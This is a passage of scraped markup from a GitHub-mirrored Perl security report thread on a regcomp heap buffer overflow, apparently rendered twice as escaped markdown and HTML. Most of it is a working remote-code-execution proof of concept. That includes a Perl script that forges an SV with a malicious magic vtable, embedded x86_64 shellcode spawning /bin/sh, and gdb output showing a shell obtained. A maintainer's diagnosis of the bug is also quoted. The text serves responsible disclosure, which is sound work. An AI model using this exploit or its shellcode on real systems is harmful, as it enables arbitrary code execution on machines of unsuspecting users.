at inline\\.h\u0026#8203;:227\n\u003e \\#9 do\\_clean\\_named\\_objs \\(sv=sv@\u0026#8203;entry=0xa2e958\\) at sv\\.c\u0026#8203;:560\n\u003e \\#10 0x0000000000524a07 in S\\_visit \\(f=0x5288b0 \\\u003cdo\\_clean\\_named\\_objs\u003e\\, \n\u003e flags=32777\\, mask=49407\\) at sv\\.c\u0026#8203;:476\n\u003e \\#11 0x00000000005292b0 in Perl\\_sv\\_clean\\_objs \\(\\) at sv\\.c\u0026#8203;:631\n\u003e \\#12 0x000000000044ef00 in perl\\_destruct \\(my\\_perl=\\\u003coptimized out\u003e\\) at \n\u003e perl\\.c\u0026#8203;:908\n\u003e \\#13 0x000000000041fb74 in main \\(argc=\\\u003coptimized out\u003e\\, argv=\\\u003coptimized \n\u003e out\u003e\\, env=\\\u003coptimized out\u003e\\) at perlmain\\.c\u0026#8203;:133\n\u003e \\(gdb\\) c\n\u003e Continuing\\.\n\u003e process 13359 is executing new program\u0026#8203;: /usr/bin/bash\n\u003e Error in re\\-setting breakpoint 2\u0026#8203;: Function \"S\\_mg\\_free\\_struct\" not defined\\.\n\u003e sh\\-4\\.4$ date\n\u003e Detaching after fork from child process 13509\\.\n\u003e Mon Aug 27 22\u0026#8203;:04\u0026#8203;:46 JST 2018\n\u003e \\`\\`\\`\n\u003e \n\u003e 2018\\-08\\-16 12\u0026#8203;:52 GMT\\+09\u0026#8203;:00 Karl Williamson via RT \n\u003e \\\u003cperl5\\-security\\-report\\-followup@\u0026#8203;perl\\.org \n\u003e \\\u003cmailto\u0026#8203;:perl5\\-security\\-report\\-followup@\u0026#8203;perl\\.org\u003e\u003e\u0026#8203;:\n\u003e \n\u003e Resending this as it did not make it to the list\u0026#8203;:\n\u003e \n\u003e On Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e \u003e I suspect this is a serious security issue\\. One can position where\n\u003e \u003e beyond the end of buffer gets written by adding \\\\x80's to the ones\n\u003e \u003e already there\\. But I'd be happy to be wrong about this\\.\n\u003e \u003e\n\u003e \u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e \u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e \u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e \u003e instead of a literal\\.\n\u003e \u003e\n\u003e \u003e The fix is to remove the single line that incorrectly increments the\n\u003e \u003e parse pointer\\.\n\u003e \u003e I don't know that this being an experimental feature has any bearing\n\u003e \u003e on it\\.\n\u003e \u003e\n\u003e \u003e There is another thing\\. The minus sign in this case could have been\n\u003e \u003e caught as incorrect\\. But the same out\\-of\\-bounds writes would\n\u003e occur if\n\u003e \u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\u003e \u003e\n\u003e \u003e Karl Williamson\n\u003e \n\u003e ","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn 08/27/2018 07:16 AM, Eiichi Tsukata wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe following code generates a regexp which executes arbitrary command\u003cbr\u003e\nduring global destruction.\u003cbr\u003e\nIt overwrites some SV pointer address to a crafted fake SV on\u003cbr\u003e\noverwritten heap which has the malicious svt_free(shell_code) on its\u003cbr\u003e\nmagic vtable.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLimitations:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e - must set `execstack -s` to perl\u003cbr\u003e\n - require address leak(exact address of overwritten heap)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eShouldn't this be getting a CVE?\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n#!/usr/bin/perl\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e#\u003cbr\u003e\n# RCE exploit PoC for\u003cbr\u003e\n# [perl #133423] regcomp: heap-buffer-overflow write\u003cbr\u003e\n# on perl-blead-48ae8dc\u003cbr\u003e\n#\u003c/p\u003e\n\u003cp dir=\"auto\"\u003euse strict;\u003cbr\u003e\nuse warnings;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# 0xabcd =\u0026gt; '\\xcd\\xab\\x00\\x00\\x00\\x00\\x00\\x00'\u003cbr\u003e\nsub h2s {\u003cbr\u003e\n my $h = shift;\u003cbr\u003e\n my $sz = shift;\u003cbr\u003e\n my $ret = '';\u003cbr\u003e\n for (0..($sz - 1)) {\u003cbr\u003e\n $ret .= sprintf(\"\\\\x%02x\", (($h \u0026gt;\u0026gt; (8 * $_)) \u0026amp; 0xff));\u003cbr\u003e\n }\u003cbr\u003e\n return $ret\u003cbr\u003e\n}\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# must set `execstack -s` to perl\u003cbr\u003e\nmy $cmd = 'gdb -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le ';\u003cbr\u003e\nmy $prefix = '\\'my $r = \"(?[(?x:(?[\\\\\\\\a]))\\\\\\\\]a\\x00';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $address = 0xa34c7d; # overwrite start address\u003cbr\u003e\n # search with:\u003cbr\u003e\n # (gdb) b regcomp.c:14044\u003cbr\u003e\n # (gdb) p s\u003cbr\u003e\n # [CAUTION] must not contain ']' (0x5d)\u003cbr\u003e\n #\u003cbr\u003e\nmy $sv_any_address = $address + 8 + 4 + 4 + 8;\u003cbr\u003e\nmy $stash_address = $sv_any_address + 8 + 8;\u003cbr\u003e\nmy $stash_address2 = $stash_address + 8 + 4 + 4;\u003cbr\u003e\nmy $magic_address = $stash_address + 8 + 4 + 4 + 8 + 8 + 8 + 19 + 8;\u003cbr\u003e\nmy $mg_virtual_address = $magic_address + 8 + 8 + 2 + 1 + 1 + 8 + 8 + 8;\u003cbr\u003e\nmy $shell_code_address = $mg_virtual_address + 8 + 8 + 8 + 8 + 8;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $body =\u003cbr\u003e\n# sv($address)\u003cbr\u003e\n h2s($sv_any_address, 8)\u003cbr\u003e\n. h2s(0x01, 4) # sv_refcnt\u003cbr\u003e\n. h2s(0x100007, 4) # sv_flags (SVt_PVMG || SVs_OBJECT)\u003cbr\u003e\n. h2s(0x00, 8) # sv-\u0026gt;sv_u.svu_pv\u003cbr\u003e\n# any($sv_any_address)\u003cbr\u003e\n. h2s($stash_address, 8) # HV* xmg_stash\u003cbr\u003e\n. h2s($magic_address, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_stash($stash_address)\u003cbr\u003e\n. h2s($stash_address2, 8) # sv_any\u003cbr\u003e\n. h2s(0x01, 4) # sv_refcnt\u003cbr\u003e\n. h2s(0x0c, 4) # sv_flags (SVt_PVHV)\u003cbr\u003e\n# any($stash_address2)\u003cbr\u003e\n. h2s(0x00, 8) # HV* xmg_stash\u003cbr\u003e\n. h2s($magic_address, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003cbr\u003e\n. h2s(0x00, 8) # padding\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. '\" . \"a\" x 19 . \"' # padding\u003cbr\u003e\n. h2s($address, 8) # OVERWRITE gvp\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_magic($magic_address)\u003cbr\u003e\n. h2s(0x00, 8) # MAGIC* mg_moremagic;\u003cbr\u003e\n. h2s($mg_virtual_address, 8) # MGVTBL* mg_virtual /* pointer to magic\u003cbr\u003e\nfunctions */\u003cbr\u003e\n. h2s(0x00, 2) # U16 mg_private;\u003cbr\u003e\n. h2s(0x00, 1) # char mg_type;\u003cbr\u003e\n. h2s(0x00, 1) # U8 mg_flags;\u003cbr\u003e\n. h2s(0x00, 8) # SSize_t mg_len;\u003cbr\u003e\n. h2s(0x00, 8) # SV* mg_obj;\u003cbr\u003e\n. h2s(0x00, 8) # char* mg_ptr;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# mg_virual($mg_virtual_address)\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_get) (pTHX_ SV *sv,\u003cbr\u003e\nMAGIC* mg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_set) (pTHX_ SV *sv,\u003cbr\u003e\nMAGIC* mg);\u003cbr\u003e\n. h2s(0x00, 8) # U32 (*svt_len) (pTHX_ SV *sv,\u003cbr\u003e\nMAGIC* mg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_clear)(pTHX_ SV *sv, MAGIC* mg);\u003cbr\u003e\n. h2s($shell_code_address, 8) # int (*svt_free) (pTHX_ SV *sv,\u003cbr\u003e\nMAGIC* mg);\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# x86_64 shell_code\u003cbr\u003e\n.\u003cbr\u003e\n'\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05'\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. '])a\\\\\\\\6\"; qr/$r/\\'';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $payload = $prefix . $body;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eprint $cmd . $payload . \"\\n\";\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSample output\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n[eiichi@x1 exploit]$ perl perl_regexp_mg_free.pl\u003cbr\u003e\n\u0026lt;http://perl_regexp_mg_free.pl\u0026gt;\u003cbr\u003e\ngdb -q --args ~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le\u003cbr\u003e\n'my $r =\u003cbr\u003e\n\"(?[(?x:(?[\\\\a]))\\\\]a\\x00\\x95\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xb5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\u003cbr\u003e\n. \"a\" x 19 .\u003cbr\u003e\n\"\\x7d\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05])a\\\\6\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\n[eiichi@x1 exploit]$ gdb -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le 'my $r =\u003cbr\u003e\n\"(?[(?x:(?[\\\\a]))\\\\]a\\x00\\x95\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xb5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\u003cbr\u003e\n. \"a\" x 19 .\u003cbr\u003e\n\"\\x7d\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05])a\\\\6\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\nReading symbols from\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl...done.\u003cbr\u003e\n(gdb) b regcomp.c:14044\u003cbr\u003e\nBreakpoint 1 at 0x4cb38d: file regcomp.c, line 14044.\u003cbr\u003e\n(gdb) run\u003cbr\u003e\nStarting program:\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le\u003cbr\u003e\nmy\\ \\$r\\ =\\\u003cbr\u003e\n\\\"\\(\\?\\[\\(\\?x:\\(\\?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\"\\\u003cbr\u003e\n.\\ \\\"a\\\"\\ x\\ 19\\ .\\\u003cbr\u003e\n\\\"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\\\"\\;\\\u003cbr\u003e\nqr/\\$r/\u003cbr\u003e\n[Thread debugging using libthread_db enabled]\u003cbr\u003e\nUsing host libthread_db library \"/lib64/libthread_db.so.1\".\u003cbr\u003e\nwarning: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:2) Looking for DESTROY method for IO::File\u003cbr\u003e\n(-e:2) Looking for method DESTROY in package IO::File\u003cbr\u003e\n(-e:2) Looking for method DESTROY in package UNIVERSAL\u003cbr\u003e\n(-e:2) Looking for method AUTOLOAD in package IO::File\u003cbr\u003e\n(-e:2) Looking for method AUTOLOAD in package UNIVERSAL\u003cbr\u003e\n(-e:2) Set cached DESTROY method 0 for IO::File\u003cbr\u003e\nEnabling \u003cmath-renderer class=\"js-inline-math\" style=\"display: inline-block\" data-static-url=\"https://github.githubassets.com/static\" data-run-id=\"d0490739a8a4a2b21875cd89032c2637\"\u003e$` $\u003c/math-renderer\u003e\u0026amp;amp; $' support (0x7).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eEXECUTING...\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCompiling REx\u003cbr\u003e\n\"(?[(?x:(?[\\a]))\\]a%0%x{95}L%x{a3}%0%0%0%0%0%1%0%0%0%7%0%20%0\"...\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?x:(?[\\a]))\\]a?L??L???L?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e ?aaaaaaaaaaaaaaaaaaa}L?M?\u0026lt;M?H1H?/bin//shPH?WH??B;])a\\6/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?x:(?[ \u0026lt;-- HERE \\a]))\\]a?L??L???L?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e ?aaaaaaaaaaaaaaaaaaa}L?M?\u0026lt;M?H1H?/bin//shPH?WH??B;])a\\6/ at -e line 1.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 1, S_regatom (pRExC_state=pRExC_state@entry=0x7fffffffcd40,\u003cbr\u003e\nflagp=flagp@entry=0x7fffffffca24,\u003cbr\u003e\n depth=depth@entry=4) at regcomp.c:14044\u003cbr\u003e\n14044 *(s)++ = (U8) ender;\u003cbr\u003e\nMissing separate debuginfos, use: dnf debuginfo-install\u003cbr\u003e\nkeyutils-libs-1.5.10-6.fc28.x86_64 krb5-libs-1.16.1-13.fc28.x86_64\u003cbr\u003e\nlibcom_err-1.44.2-0.fc28.x86_64\u003cbr\u003e\nlibnsl2-1.2.0-2.20180605git4a062cf.fc28.x86_64\u003cbr\u003e\nlibselinux-2.8-1.fc28.x86_64 libtirpc-1.0.3-3.rc2.fc28.x86_64\u003cbr\u003e\nlibxcrypt-4.1.1-4.fc28.x86_64 openssl-libs-1.1.0h-3.fc28.x86_64\u003cbr\u003e\npcre2-10.31-8.fc28.x86_64 zlib-1.2.11-8.fc28.x86_64\u003cbr\u003e\n(gdb) p s\u003cbr\u003e\n$1 = 0xa34c7d \"\"\u003cbr\u003e\n(gdb) b S_mg_free_struct\u003cbr\u003e\nBreakpoint 2 at 0x4f0620: file mg.c, line 556.\u003cbr\u003e\n(gdb) dis br 1\u003cbr\u003e\n(gdb) c\u003cbr\u003e\nContinuing.\u003cbr\u003e\npanic: reg_node overrun trying to emit 0, a34d5c\u0026gt;=a34c8c at -e line 1.\u003cbr\u003e\nCleaning named glob SV object:\u003cbr\u003e\n SV = PVMG(0xa34c95) at 0xa34c7d\u003cbr\u003e\n REFCNT = 1\u003cbr\u003e\n FLAGS = (OBJECT)\u003cbr\u003e\n IV = 0\u003cbr\u003e\n NV = 5.28751820946919e-317\u003cbr\u003e\n PV = 0\u003cbr\u003e\n MAGIC = 0xa34ce8\u003cbr\u003e\n MG_VIRTUAL = 0xa34d14\u003cbr\u003e\n MG_TYPE = PERL_MAGIC_sv(\\0)\u003cbr\u003e\n STASH = 0xa34ca5\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 2, S_mg_free_struct (sv=sv@entry=0xa34ca5, mg=0xa34ce8) at\u003cbr\u003e\nmg.c:556\u003cbr\u003e\n556 const MGVTBL* const vtbl = mg-\u0026gt;mg_virtual;\u003cbr\u003e\n(gdb) bt\u003cbr\u003e\n#0 S_mg_free_struct (sv=sv@entry=0xa34ca5, mg=0xa34ce8) at mg.c:556\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"24492722\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/1\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/1/hovercard\" href=\"https://github.com/Perl/perl5/pull/1\"\u003e#1\u003c/a\u003e 0x00000000004f1153 in Perl_mg_free (sv=sv@entry=0xa34ca5) at mg.c:588\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"32825340\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/2\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/2/hovercard\" href=\"https://github.com/Perl/perl5/pull/2\"\u003e#2\u003c/a\u003e 0x0000000000527d9e in Perl_sv_clear (orig_sv=orig_sv@entry=0xa34ca5)\u003cbr\u003e\nat sv.c:6539\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"35342020\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/3\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/3/hovercard\" href=\"https://github.com/Perl/perl5/pull/3\"\u003e#3\u003c/a\u003e 0x0000000000528784 in Perl_sv_free2 (sv=0xa34ca5, rc=\u0026lt;optimized\u003cbr\u003e\nout\u0026gt;) at sv.c:7038\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"38664231\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/4\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/4/hovercard\" href=\"https://github.com/Perl/perl5/pull/4\"\u003e#4\u003c/a\u003e 0x00000000005273ec in S_SvREFCNT_dec (sv=\u0026lt;optimized out\u0026gt;) at\u003cbr\u003e\ninline.h:216\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"39416547\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/5\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/5/hovercard\" href=\"https://github.com/Perl/perl5/pull/5\"\u003e#5\u003c/a\u003e S_curse (sv=sv@entry=0xa34c7d, check_refcnt=check_refcnt@entry=true)\u003cbr\u003e\nat sv.c:6970\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"53427695\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/6\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/6/hovercard\" href=\"https://github.com/Perl/perl5/pull/6\"\u003e#6\u003c/a\u003e 0x000000000052783a in Perl_sv_clear (orig_sv=orig_sv@entry=0xa34c7d)\u003cbr\u003e\nat sv.c:6531\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"90982472\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/7\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/7/hovercard\" href=\"https://github.com/Perl/perl5/pull/7\"\u003e#7\u003c/a\u003e 0x0000000000528784 in Perl_sv_free2 (sv=sv@entry=0xa34c7d,\u003cbr\u003e\nrc=\u0026lt;optimized out\u0026gt;) at sv.c:7038\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"98283145\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/8\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/8/hovercard\" href=\"https://github.com/Perl/perl5/pull/8\"\u003e#8\u003c/a\u003e 0x0000000000528c48 in S_SvREFCNT_dec_NN (sv=0xa34c7d) at inline.h:227\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"98288284\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/9\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/9/hovercard\" href=\"https://github.com/Perl/perl5/pull/9\"\u003e#9\u003c/a\u003e do_clean_named_objs (sv=sv@entry=0xa2e958) at sv.c:560\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"170856524\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/10\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/10/hovercard\" href=\"https://github.com/Perl/perl5/pull/10\"\u003e#10\u003c/a\u003e 0x0000000000524a07 in S_visit (f=0x5288b0 \u0026lt;do_clean_named_objs\u0026gt;,\u003cbr\u003e\nflags=32777, mask=49407) at sv.c:476\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"214252446\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/11\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/11/hovercard\" href=\"https://github.com/Perl/perl5/pull/11\"\u003e#11\u003c/a\u003e 0x00000000005292b0 in Perl_sv_clean_objs () at sv.c:631\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"275535515\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/12\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/12/hovercard\" href=\"https://github.com/Perl/perl5/pull/12\"\u003e#12\u003c/a\u003e 0x000000000044ef00 in perl_destruct (my_perl=\u0026lt;optimized out\u0026gt;) at\u003cbr\u003e\nperl.c:908\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"329536409\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/13\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/13/hovercard\" href=\"https://github.com/Perl/perl5/pull/13\"\u003e#13\u003c/a\u003e 0x000000000041fb74 in main (argc=\u0026lt;optimized out\u0026gt;, argv=\u0026lt;optimized\u003cbr\u003e\nout\u0026gt;, env=\u0026lt;optimized out\u0026gt;) at perlmain.c:133\u003cbr\u003e\n(gdb) c\u003cbr\u003e\nContinuing.\u003cbr\u003e\nprocess 13359 is executing new program: /usr/bin/bash\u003cbr\u003e\nError in re-setting breakpoint 2: Function \"S_mg_free_struct\" not defined.\u003cbr\u003e\nsh-4.4$ date\u003cbr\u003e\nDetaching after fork from child process 13509.\u003cbr\u003e\nMon Aug 27 22:04:46 JST 2018\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e2018-08-16 12:52 GMT+09:00 Karl Williamson via RT\u003cbr\u003e\n\u0026lt;perl5-security-report-followup@perl.org\u003cbr\u003e\n\u0026lt;mailto:perl5-security-report-followup@perl.org\u0026gt;\u0026gt;:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" 